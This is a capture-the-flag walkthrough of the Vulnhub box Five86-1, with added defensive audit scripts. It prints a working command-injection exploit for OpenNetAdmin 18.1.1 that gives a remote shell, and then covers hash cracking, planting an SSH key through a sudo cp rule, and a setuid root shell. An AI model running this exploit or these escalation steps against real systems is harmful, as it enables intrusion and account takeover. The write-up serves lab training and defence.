Five-86 walkthrough (without metasploit)

MachineX, published in Armour Infosec. Feb 6, 2020

Today, I will share my walkthrough for the CTF challenge of the Vulnhub machine Five86-1. The machine level is beginner to intermediate. We will be solving it without using Metasploit.

You can download this box here.

Methodology applied:

Host discovery →to get the machine IP

  • netdiscover
  • nmap

Enumeration

  • gobuster
  • nikto

Both the tools used above are for web enumeration.

Exploiting services

  • exploiting OpenNetAdmin
  • cracking the hashes

Privilege escalation

  • Abusing SUID

Walkthrough begins. We are going to solve this without using Metasploit (this might give you a feeling of satisfaction).

Host discovery

The very first step we take while taking down a machine is to find its IP. For this I am going to use netdiscover. As I attached a host-only network adapter to the machine, my interface is going to be “vboxnet0”.

┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #netdiscover -i vboxnet0

Our machine IP is 192.168.56.12. The other one is the DHCP server of VirtualBox.

We could also use nmap as follows:

┌─[root@machine]─[~/mine/five66]
└──╼ #nmap 192.168.56.1/24

Now that we know the target IP, we move on to next stage i.e. enumeration.

Enumeration

First, run an nmap scan with the -sV switch on all ports.

┌─[root@machine]─[~/mine/five66]
└──╼ #nmap -v -sV -p- 192.168.56.15

We see port 80 open, so we open it in the browser and get a blank page. So we go for robots.txt, and it gives us one directory.

We try this directory in the browser, and get this.

NOTE: We could alternatively use nikto for more information.

┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #nikto -h http://192.168.56.15

Let's try the /reports directory. We get the following:

NOTE: my machine IP has changed, as I had to reset it for blogging purposes.

Looks like it has HTTP authentication, for which we don't have any credentials, so we leave it.

Also, for directory brute-forcing, we could use gobuster.

┌─[root@machine]─[~/mine/five66]
└──╼ #gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.15

Now we go back to the ona (OpenNetAdmin) directory and search for an exploit for its version, v18.1.1. We get the following:

We found an exploit written in bash for the version of OpenNetAdmin we have. When we try to run it, it gives us some errors regarding the line termination (the script has Windows CRLF line endings, so bash sees a stray carriage return at the end of every line). After a little Google search, I found a simple solution to the problem: “dos2unix”.

┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #dos2unix ona.sh
dos2unix: converting file ona.sh to Unix format...
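To see why dos2unix fixes the error, here is an added example (not part of the original post or of the exploit script): a CRLF-terminated script is constructed in a temp directory, run once to show the stray carriage return in its output, and then converted the way dos2unix converts it. The file names and contents are constructed for the demo.

```shell
#!/bin/sh
# Added example: detect Windows (CRLF) line endings in a shell script and
# convert them to Unix (LF), which is what dos2unix does. All sample
# files below are constructed in a temp directory.

# Return 0 if the file contains a carriage return anywhere.
has_crlf() {
    grep -q "$(printf '\r')" "$1"
}

# Delete every carriage return, writing the result back in place.
# tr is used instead of sed because '\r' in sed is a GNU extension.
strip_crlf() {
    tmp="$1.lf"
    tr -d '\r' < "$1" > "$tmp" && mv "$tmp" "$1"
}

# Run a script with sh and return only its first output line, so the
# effect of a trailing CR ("hello\r" instead of "hello") is visible.
run_first_line() {
    sh "$1" 2>&1 | head -n 1
}

demo() {
    d=$(mktemp -d)
    # Constructed script: every line ends in \r\n, as if saved on Windows.
    printf '#!/bin/sh\r\necho hello\r\n' > "$d/crlf.sh"
    if has_crlf "$d/crlf.sh"; then
        echo "crlf.sh has CRLF line endings; raw first output line:"
        run_first_line "$d/crlf.sh" | od -c | head -n 1
    fi
    strip_crlf "$d/crlf.sh"
    echo "after conversion: $(run_first_line "$d/crlf.sh")"
    rm -rf "$d"
}
demo
```

The `od -c` line in the demo shows the `\r` that follows `hello` before conversion; after `strip_crlf` the script prints a clean `hello`, which is exactly the difference that made the exploit script error out before dos2unix was run.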

Exploit looks like this:

#!/bin/bash
# first and only argument: URL of the OpenNetAdmin install
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Even if we are not well acquainted with bash, with a little programming knowledge we can tell that it takes the URL as an argument, which in this case should be the URL of the OpenNetAdmin page:

┌─[✗]─[root@machine]─[~/mine/five66]
└──╼ #bash ona.sh http://192.168.56.15/ona/

Boom!!! we got a shell.

Privilege Escalation

After getting the shell we realize that we can't change directory. No matter where we try to go, we stay in the same directory, /opt/ona/www. Then we went on to check other web-related files, and we really get something upon doing so:

Douglas could be a potential user, and not only that, they also gave us a hint: “it's a 10 character password containing only the letters aefhrt”.

Fair enough, we use crunch to create a password list for brute force using only these letters. The output is saved in the file ansh.

┌─[root@machine]─[~/mine/five66]
└──╼ #crunch 10 10 aefhrt -o ansh

Now we check the hash type with hash-identifier:

hash type: [+] MD5(APR)

Cracking the hash

To crack the hash, we use the most desired tool we have, hashcat.

Type of hash : MD5(APR)

┌─[root@machine]─[~/mine/five66]
└──╼ #hashcat -m 1600 -a 0 hashfile ansh -o password

We have the password for douglas: fatherrrrr.
Log in as the user.

Switching users (the fun part of this box!!)

We check our sudo rights, and we find a command, /bin/cp, which cannot be run as root but can be executed as the user jen.

douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
douglas@five86-1:~$

NOTE: we can ssh into jen if the /home/jen/.ssh/authorized_keys file has our public key.

So we copy our id_rsa.pub to /tmp/authorized_keys and give it permission 777 so that jen can access it.

douglas@five86-1:~$ cp .ssh/id_rsa.pub /tmp/authorized_keys 
douglas@five86-1:~$ chmod 777 /tmp/authorized_keys

Now comes the main part. We use the sudo rule to copy this file into /home/jen/.ssh/authorized_keys, and then ssh in as jen!

douglas@five86-1:~$ sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
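Seen from the defender's side, two conditions made this step work: a sudo rule letting one account run /bin/cp as another (which is write access to every file the target account owns, including its authorized_keys), and a world-writable key file staged in /tmp. The following is an added example, not part of the original post: two audit checks run against constructed rule text and constructed files in a temp directory. The first accepts either sudoers lines or lines in the `sudo -l` output format shown above; the list of flagged binaries is my own choice, not a complete one.

```shell
#!/bin/sh
# Added example: audit checks for the two weaknesses used in this step.
# All rule text and files are constructed; nothing here reads the real
# sudoers file or any real home directory.

# Print every rule (one per line on stdin) that lets the caller run a
# file-copying or file-writing utility as some other account. Matches
# both "user ALL=(jen) NOPASSWD: /bin/cp" and the "(jen) NOPASSWD:
# /bin/cp" lines printed by sudo -l. The binary list is illustrative.
flag_risky_sudo_rules() {
    grep -E '\([^)]*\)[[:space:]]*(NOPASSWD:)?[[:space:]]*/(usr/)?bin/(cp|mv|tee|dd|install)([[:space:]]|$)'
}

# Return 0 if the given file is group- or world-writable. OpenSSH with
# StrictModes (the default) refuses an authorized_keys file in that
# state, so this is the same condition sshd itself enforces.
is_group_or_world_writable() {
    [ -n "$(find "$1" -prune \( -perm -g=w -o -perm -o=w \) -print)" ]
}

demo() {
    # Constructed rules: the first and third should be flagged.
    rules='douglas ALL=(jen) NOPASSWD: /bin/cp
alice ALL=(root) /usr/bin/less
bob ALL=(ALL) NOPASSWD: /usr/bin/tee
carol ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx'
    echo "risky sudo rules:"
    printf '%s\n' "$rules" | flag_risky_sudo_rules

    d=$(mktemp -d)
    # Constructed key files: one staged with mode 777, one kept at 600.
    echo 'ssh-ed25519 AAAAconstructed constructed@example' > "$d/staged_keys"
    chmod 777 "$d/staged_keys"
    echo 'ssh-ed25519 AAAAconstructed constructed@example' > "$d/authorized_keys"
    chmod 600 "$d/authorized_keys"
    for f in "$d/staged_keys" "$d/authorized_keys"; do
        if is_group_or_world_writable "$f"; then
            echo "WRITABLE: $f"
        else
            echo "ok:       $f"
        fi
    done
    rm -rf "$d"
}
demo
```

On a real host the first check would be fed `sudo -l` output or the lines of /etc/sudoers and /etc/sudoers.d/*, and the second would be run over every ~/.ssh/authorized_keys; the fix for the rule itself is to grant a purpose-built script rather than a general copy utility.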

Right after we log in as jen using ssh, we see that it has mail. Let's check it.

jen@five86-1:~$ mail
Mail version 8.1.2 01/15/2001. Type ? for help.
"/var/mail/jen": 1 message 1 new
>N 1 roy@five86-1 Wed Jan 01 03:17 28/885 Monday Moss
& t
Message 1:

The password for another user, Moss, is in front of us: Fire!Fire!

moss@127.0.0.1's password: 
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 4 04:09:50 2020 from 127.0.0.1
moss@five86-1:~$

We see a directory, .games, which seems to be of interest. So we check it further, and we see a setuid LSB PIE executable, running as root.

Let's run it!!!!
It appears to be a script which leaves us with a root shell in the end!!
Damn!! That was the thing we wanted from the very beginning.

NOTE: enter the command bash after “Made in Britain”.
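A root-setuid program sitting in a user's home directory is the kind of thing a host baseline should catch. As an added example (not part of the original post), the function below lists setuid files under a tree while skipping the standard package directories, so anything like the .games binary above stands out. The tree and file names it runs on here are constructed in a temp directory; the real binary's name is not given in the write-up, so a placeholder is used.

```shell
#!/bin/sh
# Added example: find setuid files outside the usual system binary
# directories. The sample tree is constructed; "game" is a placeholder
# name, not the binary from the box.

# Print regular files under $1 with the setuid bit set, ignoring the
# paths where package-managed setuid binaries normally live.
find_unexpected_setuid() {
    find "$1" -type f -perm -4000 \
        ! -path '*/usr/bin/*' ! -path '*/usr/sbin/*' \
        ! -path '*/usr/lib/*' ! -path '*/usr/libexec/*' \
        ! -path '*/bin/*' ! -path '*/sbin/*' \
        -print
}

demo() {
    d=$(mktemp -d)
    mkdir -p "$d/home/moss/.games" "$d/usr/bin"
    # Constructed: a setuid file in a home directory (suspicious) and one
    # under usr/bin (expected, like passwd on a real system).
    : > "$d/home/moss/.games/game"; chmod 4755 "$d/home/moss/.games/game"
    : > "$d/usr/bin/passwd";         chmod 4755 "$d/usr/bin/passwd"
    echo "unexpected setuid files under $d:"
    find_unexpected_setuid "$d" | while read -r f; do
        ls -l "$f"
    done
    rm -rf "$d"
}
demo
```

On a live system you would run it against / and add `-user root` to the find expression, since a setuid file owned by an ordinary user is far less interesting than one that elevates to root, as the one in .games does.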

Thanks for reading! That's how we root this box, “without using Metasploit”.
Any changes the readers suggest are wholeheartedly welcomed!
